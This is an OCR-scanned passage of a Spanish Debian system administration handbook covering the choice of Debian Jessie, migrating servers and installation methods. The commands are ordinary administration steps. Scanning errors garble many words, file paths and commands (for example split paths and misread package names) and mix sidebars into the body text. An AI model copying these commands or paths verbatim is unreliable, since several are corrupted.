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■  Estadfsticamente,  se  publican  nuevas  versiones  de  cada  18  a  24  meses  y  reciben  soporte 
durante  los  siguientes  5  anos,  un  cronograma  que  es  aceptable  para  los  administradores. 

■  Una  encuesta  de  varias  compamas  francesas  de  servicios  especializadas  en  software  libre 
mostro  que  todas  ellas  proveen  asistencia  tecnica  para  Debian;  es  tambien,  para  muchas 
de  ellas,  la  distribucion  elegida  internamente.  Esta  diversidad  de  potenciales  proveedores 
es  un  componente  importante  en  la  independencia  de  Falcot  Corp. 

■  Finalmente,  Debian  esta  disponible  para  una  multitud  de  arquitecturas,  incluyendo 
ppc64el  para  procesadores  OpenPOWER;  sera  posible,  entonces,  instalarla  en  los  varios 
servidores  IBM  de  Falcot  Corp. 


EN  LA  PRACTICA 

Debian  Long  Term 
Support  (soporte  para 
Debian  a  largo  plazo) 


El  proyecto  del  equipo  de  Largo  plazo  de  Debian  («Long  Time  Suport,  LTS)  empezo 
en  2014  y  su  meta  es  ofrecer  5  anos  de  soporte  en  cuanto  a  seguridad  para  todas 
las  versiones  de  Debian.  Ya  que  companias  con  grandes  despliegues  priman  la  im- 
portancia  de  LTS,  este  proyecto  intenta  juntar  recursos  para  las  empresas  que  usan 
Debian. 


https://wiki.debian.org/LTS 

Falcot  Corp  no  es  suficientemente  grande  como  para  permitir  que  un  empleado 
de  su  departamento  de  Tl  colabore  con  el  proyecto  LTS,  asf  que  la  empresa  ha 
optado  para  firmar  el  Contrato  Debian  LTS  de  Freexian  y  ofecer  soporte  economico. 
Gracias  a  esto,  los  administradores  de  Falcot  saben  que  los  paquetes  que  usan  seran 
tratados  con  prioridad  y  que  tendran  contacto  directo  con  el  equpo  LTS  en  caso  de 
problemas. 

https : //wiki .debian . org/ LTS/ Funding 
•-  http : //www. freexian . com/services/debian- its . htmi 


Una  vez  que  se  eligio  Debian,  se  debe  decidir  que  version  utilizar.  Veamos  porque  los  adminis¬ 
tradores  eligieron  Debian  Jessie. 


2.5.  ^Por  que  Debian  Jessie? 

Toda  version  publicada  de  Debian  comienza  su  vida  como  una  distribucion  en  cambio  constante, 
tambien  conocida  como  «Testing».  Pero  al  momento  de  escribir  estas  lineas,  Debian  Jessie  es  la 
ultima  version  estable  ( «Stable» )  de  Debian. 

La  eleccion  de  Debian  Jessie  esta  bien  justificada  basandose  en  el  hecho  de  que  cualquier  admi- 
nistrador  preocupado  por  la  calidad  de  sus  servidores  naturalmente  gravitara  hacia  la  version 
estable  de  Debian.  Aun  cuando  la  version  estable  anterior  sera  actualizada  por  un  tiempo,  los  ad¬ 
ministradores  de  Falcot  no  la  consideran  porque  su  periodo  de  soporte  no  durara  lo  suficiente 
y  porque  la  ultima  version  incluye  funcionalidades  interesantes  que  consideran  importantes. 
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Coexistencia  en  entornos  heterogeneos  44  Como  migrar  45 


Cualquier  rediseno  de  un  sistema  informatico  deberia  tener  en  cuenta  el  sistema  existente.  Esto  permite 
maximizar  la  reutilizacion  de  los  recursos  disponiblesy  garantiza  la  interop erabilidad  entre  los  varios 
elementos  que  comprenden  al  sistema.  Este  estudio  introduced  un  marco  de  trabajo  generico  a  seguir  en 
cualquier  migracion  de  infraestructura  informatica  a  Linux. 


3.1.  Coexistencia  en  entornos  heterogeneos 


Debian  se  integra  perfectamente  en  todos  los  tipos  de  entornos  existentes  y  funciona  muy  bien 
con  otros  sistemas  operativos.  Esta  armom'a  casi  perfecta  es  fruto  de  la  presion  del  mercado  que 
demanda  que  los  distribuidores  de  software  desarrollen  programas  que  cumplan  estan  dares.  El 
cumplimiento  de  los  estandares  permite  a  los  administradores  cambiar  programas  por  otros: 
clientes  o  servidores,  sean  libres  o  no. 


3.1.1  Integracion  con  equipos  Windows 

La  compatibilidad  con  SMB/CIFS  de  Samba  garantiza  una  comunicacion  excelente  en  un  contex- 
to  Windows.  Comparte  archivos  y  colas  de  impresion  con  clientes  Windows  e  incluye  software 
que  le  permite  a  un  equipo  Linux  utilizar  recursos  disponibles  en  servidores  Windows. 


HERRAMIENTA  La  ultima  version  de  Samba  puede  remplazar  la  mayoria  de  caracteristicas  de  Win- 
Samba  dows:  desde  las  mas  simples  de  un  simple  servidor  Windows  NT  (autenticacion, 
archivos,  colas  de  impresion,  descarga  de  controladores  de  impresion,  DFS  (dis¬ 
tributed  File  System»,  etc)  hasta  las  mas  avanzadas  (un  controlador  de  dominio 
compatible  con  Active  Directory). 


3.1.2.  Integracion  con  equipos  OS  X 

Los  equipos  OS  X  proveen  y  pueden  utilizar  servicios  de  red  como  servidores  de  archivos  e  im- 
presoras  compartidas.  Estos  servicios  se  publican  en  la  red  local,  lo  que  permite  que  otros  equi¬ 
pos  los  descubran  y  utilicen  sin  necesitar  configuracion  manual,  utilizando  la  implementacion 
Bonjour  de  la  suite  de  protocolos  Zeroconf.  Debian  incluye  otra  implementacion  que  provee  la 
misma  funcionalidad  llamada  Avahi. 

De  la  misma  forma,  puede  utilizar  el  demonio  Netatalk  para  proveer  un  servidor  de  archivos  a 
equipos  OS  X  en  la  red.  El  mismo  implementa  el  protocolo  AFP  (AppleShare)  asf  como  tambien 
las  notificaciones  necesarias  para  que  los  clientes  OS  X  puedan  descubrir  automaticamente  los 
servidores. 

Las  redes  Mac  OS  antiguas  (anteriores  a  OS  X)  utilizaban  un  protocolo  diferente  llamado  Apple- 
Talk.  Aquellos  entornos  que  involucren  equipos  que  utilizan  este  protocolo,  Netatalk  tambien 
provee  el  protocolo  Appletalk  (de  hecho,  comenzo  como  una  reimplementacion  del  mismo).  Ase- 
gura  el  funcionamiento  del  servidor  de  archivos  y  colas  de  impresion  asf  como  tambien  el  servi¬ 
dor  de  tiempo  (sincronizacion  de  reloj).  Sus  funciones  de  enrutamiento  permiten  la  intercone- 
xion  con  redes  AppleTalk. 


3.1.3  Integracion  con  otros  equipos  Linux/Unix 

Finalmente,  NFS  y  NIS,  ambos  incluidos,  garantizan  la  iteraccion  con  sistemas  Unix.  NFS  propor- 
ciona  la  funcionalidad  de  servidor  de  archivos  mientras  que  NIS  crea  los  directories  de  usuario. 
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La  capa  de  impresion  de  BSD,  utilizada  ampliamente  por  los  sistemas  Unix,  tambien  permite 
compartir  colas  de  impresion. 


samba  netatalk 


nfs-kemel-server 


Figura  3.1  Coexistencia  de  Debian  con  sistemas  OS  X,  Windows  y  Unix 


3.2.  Como  migrar 

Para  poder  garantizar  la  continuidad  de  los  servicios,  la  migracion  de  cada  equipo  debe  ser  plani- 
ficaday  realizada  de  acuerdo  al  plan.  Este  principio  es  aplicable  sin  importar  el  sistema  operativo 
que  utilice. 


3.2.1  Reconocimiento  e  identification  de  servicios 

Simple  como  parece,  este  paso  es  esencial.  Un  administrador  serio  realmente  conoce  los  roles 
principales  de  cada  servidor,  pero  dichos  roles  pueden  cambiar  y  a  veces  usuarios  experimenta- 
dos  pueden  haber  instalado  servicios  «salvajes».  Saber  que  existen  le  permitira,  al  menos,  decidir 
que  hacer  con  ellos  en  lugar  de  eliminarlos  sin  orden  ni  proposito. 

Por  ello,  es  buena  idea  informar  a  sus  usuarios  del  proyecto  antes  de  migrar  el  servidor.  Involu- 
crarlos  en  el  proyecto  puede  ser  util  para  instalar  el  software  libre  mas  comun  en  sus  equipos  de 
escritorio  antes  de  la  migracion,  programas  con  los  que  se  encontraran  luego  de  la  migracion  a 
Debian;  LibreOffice.org  y  la  suite  Mozilla  son  los  mejores  ejemplos  de  tales  programas. 


La  red  y  los  procesos 

La  herramienta  nmap  (en  el  paquete  del  mismo  nombre)  identificara  rapidamente  servicios  de 
internet  hospedados  en  un  equipo  conectado  a  la  red  sin  siquiera  necesitar  iniciar  sesion  en  el 
mismo.  Simplemente  ejecute  la  siguiente  orden  en  otro  equipo  conectado  a  la  misma  red: 
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$  nmap  mirwiz 

Starting  Nmap  6.47  (  http://nmap.org  )  at  2015-03-24  11:34  CET 
Nmap  scan  report  for  mirwiz  (192.168.1.104) 

Host  is  up  (0.0037s  latency). 

Not  shown:  999  closed  ports 
PORT  STATE  SERVICE 
22/tcp  open  ssh 

Nmap  done:  1  IP  address  (1  host  up)  scanned  in  0.13  seconds 


ALTERNATIVA  En  los  equipos  Linux,  la  orden  netstat  -tupan  mostrara  la  lista  de  sesiones  TCP 
Utilice  netstat  para  activas  o  pendientes  asi  como  tambien  los  puertos  UDP  en  los  que  escuchan  los 
encontrar  la  lista  de  programas.  Esto  facilita  la  identificacion  de  los  servicios  que  se  ofrecen  en  la  red. 

servicios  disponibles 

YENDO  MAS  ALLA  Algunas  ordenes  de  red  pueden  ser  utilizados  con  IPv4  (lo  predeterminado  normal- 
IPv6  rnente)  o  con  IPv6.  Las  ordenes  nmap  y  netstat  entre  ellas,  pero  tambien  hay  otros 
como  route  o  ip.  La  convencion  es  que  la  opcion  -6  activa  este  comportamiento. 


Si  el  servidor  es  un  equipo  Unix  ofreciendo  acceso  de  consola  a  los  usuarios,  es  interesante  deter- 
minarlo  si  se  ejecutan  procesos  en  segundo  piano  en  ausencia  de  su  usuario.  La  orden  ps  auxw 
muestra  una  lista  de  todos  los  procesos  con  la  identidad  de  su  usuario.  Comparar  esta  informa- 
cion  con  la  salida  de  la  orden  who,  que  provee  la  lista  de  usuarios  con  sesiones  activas,  permi- 
te  identificar  servidores  no  declarados  o  independientes  o  programas  ejecutando  en  segundo 
piano.  Revisar  crontab  (tablas  de  acciones  programadas  por  usuarios)  generalmente  proveera 
informacion  interesante  sobre  las  funciones  que  cumple  el  servidor  (una  explicacion  completa 
de  cron  esta  disponible  en  la  Seccion  9.7,  «Programacion  de  tareas  con  cron  y  atd»  pagina  218). 

En  cualquier  caso,  es  esencial  que  haga  respaldos  de  sus  servidores:  de  esta  forma  se  asegura- 
ra  que  la  informacion  pueda  ser  recuperada  despues  del  hecho,  cuando  los  usuarios  informen 
acerca  de  problemas  concretos  derivados  de  la  migracion. 


3.2.2  Respaldos  de  la  configuracion 

Es  buena  idea  conservar  la  configuracion  de  todo  servicio  identificado  para  poder  instalar  el 
equivalente  en  el  nuevo  servidor.  Como  minimo  deberia  hacer  un  respaldo  de  los  archivos  de 
configuracion. 

En  los  equipos  Unix,  los  archivos  de  configuracion  se  encuentran  normalmente  en  /etc/  pero 
puede  que  se  encuentren  en  un  subdirectorio  de  /us  r/local/.  Este  es  el  caso  si  el  programa  se 
ha  instalado  desde  las  fuentes  en  lugar  de  utilizar  un  paquete.  En  algunos  casos  podria  encon- 
trarlos  en  /  opt/. 

Para  servicios  que  administren  datos  (como  bases  de  datos),  es  muy  recomendable  exportar  los 
datos  a  un  formato  estandar  que  pueda  ser  importado  facilmente  por  el  nuevo  software.  Tal 
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formato  generalmente  esta  documentado  y  es  texto  piano;  puede  ser,  por  ejemplo,  un  volcado 
SQL  para  una  base  de  datos  o  un  archivo  LDIF  para  un  servidor  LDAP. 


bases  de  datos 


> 


- bs. 

dump.sql 


> 


Lx 

dump.ldif 


Directorio  LDAP 


Figura  3.2  Respaldos  de  base  de  datos 


Cada  software  de  servidor  es  diferente  y  es  imposible  describir  en  detalle  todos  los  casos  posi- 
bles.  Compare  la  documentacion  del  software  nuevo  y  el  actual  para  identificar  las  porciones 
exportables  (y,  por  lo  tanto,  importables)  y  aquellas  que  necesitaran  que  intervenga  de  forma 
manual.  Leer  este  libro  clarificara  la  configuracion  de  los  principales  programas  de  servidor  en 
Linux. 


3.2.3  Adopcion  de  un  servidor  Debian  existente 

Para  efectivamente  tomar  el  control  de  su  mantenimiento,  uno  podrfa  analizar  un  equipo  que 
ya  ejecuta  Debian. 

El  primer  archivo  a  revisar  es  /etc/debian_version  que  generalmente  contiene  el  numero  de 
version  para  el  sistema  Debian  instalado  (es  parte  del  paquete  base-files.  Si  indica  nombre  co 
digo/ sid  significa  que  el  sistema  fue  actualizado  con  paquetes  que  provienen  de  alguna  de  las 
distribuciones  en  desarrollo  («Testing»  o  «Unstable»). 

El  programa  apt  -  show-versions  (que  se  encuentra  en  el  paquete  Debian  que  lleva  el  mismo 
nombre)  comprueba  la  lista  de  paquetes  instalados  e  identifica  las  versiones  disponibles.  Puede 
utilizar  tambien  aptitude  para  estas  tareas,  aunque  de  un  modo  menos  sistematico. 

Revisar  el  archivo  /etc/apt/sou  rces  .  list  (y  el  directorio  /etc/apt/sou  rces  .  list .  d/)  mos- 
trara  de  donde  es  probable  que  provengan  los  paquetes  Debian.  Si  aparecen  muchas  fuentes 
desconocidas,  el  administrador  podrfa  elegir  reinstalar  el  sistema  completamente  para  asegu- 
rar  compatibilidad  optima  con  el  software  provisto  por  Debian. 

El  archivo  sources. list  es  generalmente  un  buen  indicador:  la  mayorfa  de  los  administradores 
mantienen,  al  menos  como  comentarios,  la  lista  de  fuentes  APT  utilizadas  anteriormente.  Pero 
no  debe  olvidar  que  fuentes  utilizadas  previamente  podrfan  haber  sido  eliminadas  y  se  podrfan 
haber  instalado  manualmente  paquetes  al  azar  descargados  de  internet  (con  la  orden  dp  kg).  En 
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este  caso,  la  apariencia  del  equipo  como  un  Debian  estandar  es  enganosa.  Es  por  eso  que  debe 
prestar  atencion  a  cualquier  indicacion  que  revele  la  presencia  de  paquetes  externos  (archivos 
deb  en  directories  inusuales,  numeros  de  version  de  paquetes  con  sufijos  especiales  que  indican 
su  origen  fuera  del  proyecto  Debian  como  ubuntu  o  Imde,  etc.) 

De  la  misma  forma,  es  interesante  analizar  el  contenido  del  directorio  /  us  r/ local/,  cuyo  propo- 
sito  es  albergar  programas  compilados  e  instalados  manualmente.  Generar  una  lista  de  software 
instalado  de  esta  forma  es  instructive,  ya  que  genera  dudas  sobre  las  razones  para  no  utilizar  el 
paquete  Debian  correspondiente,  si  es  que  existe. 


VISTA  RAPIDA 
cruft 


El  paquete  cruft  se  propone  listar  todos  los  archivos  disponibles  que  no  son  parte 
de  ningun  paquete.  Tiene  algunos  filtros  (mas  o  menos  efectivos  y  mas  o  menos 
actualizados)  para  evitar  reportar  archivos  legitimos  (archivos  generados  por  pa¬ 
quetes  Debian  o  archivos  de  configuracion  generados  que  no  son  administrados 
por  dpkg,  etc.). 

jTenga  cuidado  de  no  borrar  ciegamente  todo  lo  que  liste  cruft! 


3.2.4  Instalacion  de  Debian 

Una  vez  que  conoce  toda  la  informacion  del  servidor  actual,  puede  apagarlo  y  comenzar  a  ins- 
talar  Debian  en  el. 

Para  elegir  la  version  apropiada,  debemos  saber  la  arquitectura  del  equipo.  Si  es  una  PC  relati- 
vamente  reciente,  es  probable  que  sea  amd64  (equipos  mas  antiguos  usualmente  eran  i386).  En 
otros  casos  podemos  reducir  las  posibilidades  segtin  el  sistema  utilizado  previamente. 

LaTabla  3.1  no  pretende  ser  exhaustiva,  pero  puede  ser  util.  En  cualquier  caso,  la  documentacion 
original  para  el  equipo  es  la  fuente  mas  confiable  para  encontrar  esta  informacion. 


HARDWARE  La  mayoria  de  los  equipos  recientes  tiene  procesadores  Intel  o  AMD  de  64  bits,  com- 
Equipos  de  64  bits  contra  patibles  con  los  procesadores  antiguos  de  32  bits;  por  lo  tantofuncionarael  software 
equipos  de  32  bits  compilado  para  la  arquitectura  «i386».  Por  el  otro  lado,  este  modo  de  compatibili- 
dad  no  aprovecha  completamente  las  capacidades  de  estos  nuevos  procesadores.  Es 
por  esto  que  Debian  la  arquitectura  «amd64»  para  chips  AMD  recientes  asi  como 
tambien  procesadores  «em64t»  de  Intel  (incluyendo  la  serie  reciente  «Core»),  que 
son  muy  similares  a  los  procesadores  AMD64. 


3.2.5.  Instalacion  y  configuracion  de  los  servicios  seleccionados 

Una  vez  que  Debian  esta  instalado  debemos  instalar  y  configurar,  uno  por  uno,  todos  los  servi¬ 
cios  que  debe  tener  este  equipo.  La  nueva  configuracion  debe  tener  en  cuenta  la  anterior  para 
asegurar  una  transicion  fluida.  Toda  la  informacion  recolectada  en  los  primeros  dos  pasos  sera 
util  para  completar  esta  parte  exitosamente. 
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Sistema  operativo 

Arquitectura(s) 

DEC  Unix  (OSF/l) 

alpha,  mipsel 

HP  Unix 

ia64,  hppa 

IBM  AIX 

powerpe 

Irix 

mips 

OSX 

amd64,  powerpe,  i386 

z/OS,  MVS 

s390x, s390 

Solaris,  SunOS 

spare,  i386,  m68k 

Ultrix 

mips 

VMS 

alpha 

Windows  95/98/ME 

i386 

Windows  NT/2000 

i386,  alpha,  ia64,  mipsel 

Windows  XP  /  Windows  Server  2008 

i386,  amd64,  ia64 

Windows  Vista  /  Windows  7  /  Windows  8 

i386,  amd64 

Cuadro  3.1  Emparejando  sistema  operativo  y  arquitectura 


Figura  3.3  Instalacion  de  los  servicios  seleccionados 


Antes  de  sumergirse  completamente  en  este  ejercicio  es  muy  recomendable  que  lea  el  resto  de 
este  libro.  Luego  tendra  un  entendimiento  mas  preciso  de  como  configurar  los  servicios  espera- 
dos. 
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Contenidos 


Metodos  de  instalacion  52  Instalacion,  paso  a  paso  55  Luego  del  primer  arranque  72 


Para  utilizar  Debian  necesita  instalarlo  en  una  maquina;  el  programa  debian-installer  se  encarga  de 
esta  tarea.  Una  instalacion  apropiada  incluye  muchas  tareas.  Este  capitulo  las  revisa  en  orden 
cronologico. 


VOLVER  A  LOS  CIMIENTOS 

Un  curso  acelerado  en  los 
apendices 


Instalar  un  equipo  siempre  es  mas  simple  cuando  uno  conoce  como  funciona.  Si 
no  lo  sabe,  desviese  rapidamente  al  Apendice  B,  Curso  breve  de  emergencia  pagina 
473  antes  de  leer  este  capitulo. 


El  instalador  para  Jessie  esta  basado  en  debian-installer.  Su  diseno  modular  le  permite  tra- 
bajar  en  varios  escenarios  y  evolucionar  y  adaptarse  a  los  cambios.  A  pesar  de  las  limitaciones 
que  implica  la  compatibilidad  con  un  gran  numero  de  arquitecturas,  este  instalador  es  muy  ac- 
cesible  para  principiantes  ya  que  asiste  a  los  usuarios  en  cada  paso  del  proceso.  La  deteccion 
automatica  de  hardware,  el  particionamiento  guiado  y  la  interfaz  grafica  de  usuario  soluciona- 
ron  la  mayorfa  de  los  problemas  que  debfan  enfrentar  los  novatos  durante  los  primeros  anos  de 
Debian. 

La  instalacion  necesita  80  MB  de  RAM  (siglas  en  ingles  de  «memoria  de  acceso  aleatorio»)  y  al 
menos  700  MB  de  espacio  en  disco  duro.  Todos  los  equipos  de  Lalco  cumplen  con  dicho  criterio. 
Es  de  notar,  sin  embargo,  que  estos  numeros  son  aplicables  en  la  instalacion  de  un  sistema  muy 
limitado  sin  un  escritorio  grafico.  Se  recomienda  un  minimo  de  512  MB  de  RAM  y  5  GB  de  disco 
duro  en  un  equipo  de  escritorio  para  oficina. 


CUIDADO  Si  ya  tiene  Debian  Wheezy  instalado  en  su  maquina  jeste  capitulo  no  es  para  us- 
Actualizando  desde  ted!  A  diferencia  de  otras  distribuciones,  Debian  permite  actualizar  un  sistema  de 

Wheezy  una  vers'°n  a  la  siguiente  sin  tener  que  reinstalarlo.  Una  reinstalacion,  ademas  de 

innecesaria,  podrfa  ser  peligrosa  ya  que  puede  eliminar  programas  ya  instalados. 

Describiremos  el  proceso  de  actualizacion  en  la  Seccion  6.6,  «Actualizacion  de  una 
distribucion  estable  a  la  siguiente»  pagina  130. 


4.1.  Metodos  de  instalacion 

Se  puede  instalar  un  sistema  Debian  desde  diferentes  medios  siempre  que  lo  permita  el  BIOS  del 
equipo.  Puede  iniciar  desde  un  CD-ROM,  una  Have  USB  o  inclusive  desde  la  red. 


VOLVER  A  LOS  CIMIENTOS  BIOS  (las  siglas  en  ingles  de  «sistema  basico  de  entrada/salida»)  es  un  software 
BIOS  la  interfaz  tlue  se  encuentra  en  la  placa  madre  (la  placa  electronica  que  conecta  todos  los 
hardware/software  perifericos)  y  se  ejecuta  cuando  arranca  el  equipo,  para  poder  cargar  el  sistema 
operativo  (por  medio  de  un  gestor  de  arranque  adaptado).  Se  mantiene  en  ejecucion 
en  segundo  piano  para  proporcionar  una  interfaz  entre  el  hardware  y  el  software 
(en  nuestro  caso,  el  nucleo  Linux). 


4.1.1.  Instalacion  desde  CD-ROM/DVD-ROM 

El  medio  de  instalacion  mas  utilizado  es  mediante  un  CD-ROM  (o  DVD-ROM,  que  se  comporta 
exactamente  de  la  misma  forma):  el  equipo  inicia  desde  este  medio  y  el  programa  de  instalacion 
toma  el  control. 
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Diferentes  familias  de  CD-ROMs  tienen  distintos  propositos:  netinst  («network  installation*:  ins¬ 
talacion  por  red)  contiene  el  instalador  y  el  sistema  base  Debian,  se  descargaran  luego  todos  los 
otros  programas.  Su  «imagen»,  el  sistema  de  archivos  ISO-9660  que  contiene  el  contenido  exac- 
to  del  disco,  solo  ocupa  entre  150  a  280  MB  (dependiendo  de  la  arquitectura).  Por  el  otro  lado, 
el  conjunto  completo  ofrece  todos  los  paquetes  y  permite  la  instalacion  en  un  equipo  sin  acceso 
a  internet;  requiere  alrededor  de  84  CD-ROMs  (o  12  DVD-ROMs,  o  dos  discos  Blu-ray).  Pero  los 
programas  se  dividen  entre  los  discos  segun  popularidad  e  importancia;  los  primeros  tres  discos 
deberian  ser  suficientes  para  la  mayoria  de  las  instalaciones  ya  que  contienen  el  software  mas 
utilizado. 

Existe  un  ultimo  tipo  de  imagen,  conocida  como  mini .  iso,  que  solo  esta  disponible  como  pro- 
ducto  del  instalador.  La  imagen  solo  contiene  lo  minimo  indispensable  para  configurar  la  red 
y  todo  lo  demas  es  descargado  (incluyendo  las  partes  del  instalador  en  si  mismo,  lo  cual  es 
as!  porque  aquellas  imagenes  tienden  a  romperse  cuando  se  publica  una  nueva  version  del 
instalador).  Estas  imagenes  se  pueden  encontrar  en  las  replicas  de  Debian  bajo  el  directorio 
dists/reiease/main/installer- arch/ cur  rent/images/net boot/. 


SUGERENCIA  La  mayoria  de  los  CD-ROMs  y  DVD-ROMs  de  instalacion  solo  funcionan  en  una 
Discos  multiarquitectura  arquitectura  de  hardware  especifica.  Si  desea  descargar  las  imagenes  completas 

debe  tener  cuidado  de  elegir  aquella  que  funcione  en  el  hardware  del  equipo  en  el 
que  desea  instalarlo. 

Algunas  imagenes  de  CD/DVD-ROM  pueden  funcionar  en  varias  arquitecturas.  Te- 
nemos  una  imagen  de  CD-ROM  que  combina  las  imagenes  netinst  para  las  arqui¬ 
tecturas  i386  y  amd64.  Tambien  existe  una  imagen  de  DVD-ROM  que  contiene  el 
instalador  y  una  seleccion  de  paquetes  binarios  para  i386  y  amd64  as!  como  tam¬ 
bien  los  paquetes  fuente  correspondientes. 


Para  adquirir  imagenes  de  CD-ROM  de  Debian  puede,  por  supuesto,  descargarlas  y  grabarlas  en 
un  disco.  Puede  tambien  comprarlas  y,  de  esa  forma,  proveer  un  poco  de  ayuda  financiera  al 
proyecto.  En  el  sitio  web  encontrara  una  lista  de  proveedores  de  imagenes  de  CD-ROM  y  sitios 
donde  descargarlas. 

http : //www. debian . org/CD/index. html 


4.1.2  Arranque  desde  una  Have  USB 

Desde  que  la  mayor  parte  de  los  ordenadores  pueden  arrancar  desde  dispositivos  USB,  tambien 
podra  instalar  Debian  desde  un  llavero  USB  (esto  no  es  mas  que  un  pequeno  disco  de  memoria 
flash). 

El  manual  de  instalacion  explica  como  crear  una  Have  USB  que  contenga  debian-installer. 
El  procedimiento  es  muy  simple  ya  que  las  imagenes  ISO  para  arquitecturas  i386  y  amd64  son 
ahora  imagenes  hibridas  que  pueden  arrancar  tanto  desde  un  CD-ROM  como  desde  una  Have 
USB. 

Primero  debe  identificar  el  nombre  de  dispositivo  de  la  Have  U SB  (por  ejemplo:  /dev/ sd  b;  el  meto- 
do  mas  simple  para  hacerlo  es  revisar  el  mensaje  generado  por  el  nucleo  con  la  orden  dmesg.  Lue- 
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go  debe  copiar  la  imagen  ISO  ya  descargada  (por  ejemplo  debian-8.0.0-amd64-i386-netinst.iso) 
con  la  orden  cat  debian-8.0.0-amd64-i386-netinst.iso  >/dev/sdb; sync.  Esta  orden  ne- 
cesita  permisos  de  administrador  ya  que  accede  directamente  a  la  Have  USB  y  borra  su  contenido 
ciegamente. 

Podra  encontrar  una  explicacion  mas  detallada  en  el  manual  de  instalacion.  Entre  otras  cosas, 
describe  un  metodo  alternative  para  preparar  la  Have  USB  que  es  mas  complejo  pero  permite 
modificar  las  opciones  predeterminadas  del  instalador  (aquellas  definidas  en  la  lrnea  de  ordenes 
del  nucleo). 

http : //www. debian . org/ releases/stable/amd64/ch04s03 . html 


4.1.3.  Instalacion  a  traves  de  arranque  por  red 

Muchos  BIOS  permiten  arrancar  directamente  desde  la  red  descargando  un  nucleo  y  una  ima¬ 
gen  minima  para  usar  como  sistema  de  archivos  .  Este  metodo  (que  tiene  varios  nombres  como 
arranque  PXE  o  TFTP)  puede  ser  un  salvavidas  si  el  equipo  no  tiene  una  lectora  de  CD-ROM  o  si 
su  BIOS  no  puede  arrancar  por  otros  medios. 

Este  metodo  de  instalacion  funciona  en  dos  pasos.  Primero,  al  arrancar  el  equipo,  el  BIOS  (o  la 
placa  de  red)  hace  un  pedido  BOOTP/DHCP  para  adquirir  una  direccion  IP  automaticamente. 
Cuando  un  servidor  BOOTP  o  DHCP  envia  una  respuesta,  incluye  un  nombre  de  archivo  ademas 
de  la  configuracion  de  red.  Luego  de  configurar  la  red,  el  equipo  cliente  hace  un  pedido  TFTP 
(siglas  en  ingles  de  «protocolo  trivial  de  transferencia  de  archivos»)  para  el  archivo  del  nombre 
que  recibio.  Una  vez  que  adquiere  dicho  archivo,  lo  ejecuta  como  un  gestor  de  arranque.  Esto 
luego  ejecuta  el  programa  de  instalacion  de  Debian  como  si  lo  hubiese  cargado  desde  el  disco 
duro,  un  CD-ROM  o  una  Have  USB. 

Todos  los  detalles  de  este  metodo  estan  disponibles  en  la  guia  de  instalacion  (seccion  «Preparan- 
do  los  archivos  para  arranque  por  red  TFTP»). 

http : //www. debian .org/ releases/ stable/amd64/ch05s01 . html#boot - tftp 
http : //www. debian .org/ releases/ stable/amd64/ch04s05 . html 


4.1.4  Otros  metodos  de  instalacion 

Cuando  necesitamos  desplegar  instalaciones  personalizadas  para  una  gran  cantidad  de  equipos 
generalmente  elegimos  un  metodo  de  instalacion  automatico  en  lugar  de  uno  manual.  Depen- 
diendo  de  la  situacion  y  la  complejidad  de  las  instalaciones  podemos  utilizar  FAI  (siglas  de  «ins- 
talador  completamente  automatico»,  descripto  en  la  Seccion  12.3.1,  «Instalador  completamente 
automatico  (FAI:  «Fully  Automatic  Installer»)»  pagina  36l)  o  un  CD  de  instalacion  preconfigura- 
do  («preseeding»,  revise  la  Seccion  12.3.2,  «Presembrado  de  Debian-Installer»  pagina  362). 
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4.2.  Instalacion,  paso  a  paso 

4.2.1  Arranque  e  inicio  del  instalador 

Una  vez  que  el  BIOS  comenzo  el  arranque  desde  el  CD  o  DVD-ROM  aparecera  el  menu  del  gestor 
de  arranque  Isolinux.  En  esta  etapa,  el  nucleo  Linux  no  esta  cargado  aun;  este  menu  le  permite 
elegir  el  nucleo  a  arrancar  y  posiblemente  ingresar  los  parametros  a  pasarle  en  el  proceso. 

Para  una  instalacion  estandar  solo  necesita  elegir  «Instalacion»  o  «Instalacion  grafica»  (con  las 
teclas  de  flecha),  luego  presionar  la  tecla  Enter  para  iniciar  el  resto  del  proceso  de  instalacion. 
Si  el  DVD-ROM  es  un  disco  multiarquitectura  y  el  equipo  tiene  un  procesador  Intel  o  AMD  de 
64  bits,  las  opciones  «Instalacion  64  bits»  y  «Instalacion  grafica  64  bits»  permiten  instalar  la 
variante  de  64  bits  (amd.64)  en  lugar  de  la  version  predeterminada  de  32  bits  ( i386 ).  En  la  practica, 
casi  siempre  podra  utilizar  la  version  de  64  bits:  los  procesadores  mas  recientes  son  de  64  bits 
y  la  version  de  64  bits  adminstra  mejor  la  gran  cantidad  de  memoria  RAM  que  suelen  tener  los 
nuevos  equipos. 


YENDO  MAS  ALLA  La  diferencia  fundamental  entre  los  sistemas  de  32  y  64  bits  es  el  tamano  de  las 

£32  o  64  bits?  direcciones  de  memoria.  En  teoria,  un  sistema  de  32  bits  no  puede  direccionar  mas 
de  4  GB  de  RAM  (232  bytes).  En  la  practica,  es  posible  superar  esta  limitacion  usan- 
do  la  variante  686- pae  del  nucleo  siempre  que  el  procesador  sea  compatible  con 
PAE  (siglas  en  ingles  de  «extension  de  direcciones  fi'sicas»).  Sin  embargo,  usar  es¬ 
ta  funcionalidad  tiene  un  gran  impacto  en  el  rendimiento  del  sistema.  Por  el lo  es 
conveniente  usar  el  modo  de  64  bits  en  un  servidor  con  grandes  cantidades  de  RAM. 

Para  un  equipo  de  oficina  (donde  una  diferencia  en  rendimiento  de  un  pequeno  por- 
centaje  es  despreciable)  debe  tener  en  cuenta  que  algunos  programas  privativos  no 
tienen  versiones  de  64  bits  disponibles  (Skype  por  ejemplo).  Es  tecnicamente  posible 
hacerlos  funcionar  en  sistemas  de  64  bits,  pero  tendra  que  instalar  las  versiones  de 
32  bits  de  todas  las  bibliotecas  necesarias  (revise  la  Seccion  5.4.5,  «Compatibilidad 
multiarquitectura»  pagina  100)  y  a  veces  utilizar  setarch  o  linux32  (del  paquete 
utii-linux)  para  enganar  a  la  aplicacion  sobre  la  naturaleza  del  sistema. 


EN  LA  PRACTICA 

Instalacion  junto  a  un 
sistema  Windows 
existente 


Si  el  equipo  ya  ejecuta  Windows,  no  es  necesario  eliminar  el  sistema  para  poder 
instalar  Debian.  Puede  tener  ambos  sistemas  simultaneamente,  cada  uno  instalado 
en  un  disco  o  particion  separado,  y  elegir  cual  iniciar  al  momento  de  arrancar  el 
equipo.  Generalmente  esta  configuracion  es  llamada  «arranque  dual»  y  el  sistema 
de  instalacion  de  Debian  puede  configurarla.  Esto  se  realiza  durante  la  etapa  de 
particionado  del  disco  duro  de  la  instalacion  y  durante  la  configuracion  del  gestor 
de  arranque  (revise  los  recuadros  «Reduciendo  una  particion  Windows»  pagina  66 
